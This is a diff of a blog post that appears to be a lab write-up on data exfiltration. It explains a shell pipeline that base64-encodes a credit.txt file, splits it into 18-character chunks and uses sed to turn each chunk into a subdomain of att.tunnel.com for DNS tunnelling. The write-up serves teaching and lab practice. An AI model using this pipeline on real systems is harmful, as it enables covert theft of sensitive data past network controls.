CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

     1. `cat task9/credit.txt` Display the contents of the `credit.txt` file located in the `task9` directory.
     2. `base64` We also used **base64 encoding** on the HTTP section.
     3. `tr -d "\n"` The `tr` command is used for translating or deleting characters.
 In this case, we use it to remove newline characters, `\n` from the output.
 Newline characters are typically used to separate lines of text, so with this, we essentially remove line breaks.
-    4. `fold -w18` The `fold` command is used to wrap text to a specified width, in this case, it wraps the text into line of 18 characters each.
+    4. `fold -w18` The `fold` command is used to wrap text to a specified width, in this case, it wraps the text into lines of 18 characters each.
 This helps format the data info fixed-width lines.
     5. `sed -r 's/.*/&.att.tunnel.com/'` We have seen the stream editor before as well.
-We now use with regular expressions, aka **regex**, to modify each line of the input text:
+We now use it with [regular expressions](https://www.w3schools.com/js/js_regexp.asp), aka **regex**, to modify each line of the input text:
         - `-r` This tells `sed` to used extended regex.
         - `s/.*/&.att.tunnel.com/'` This is a regex substitution.
 It takes each line (`.*` matches the entire line), and appends `.att.tunnel.com` to it.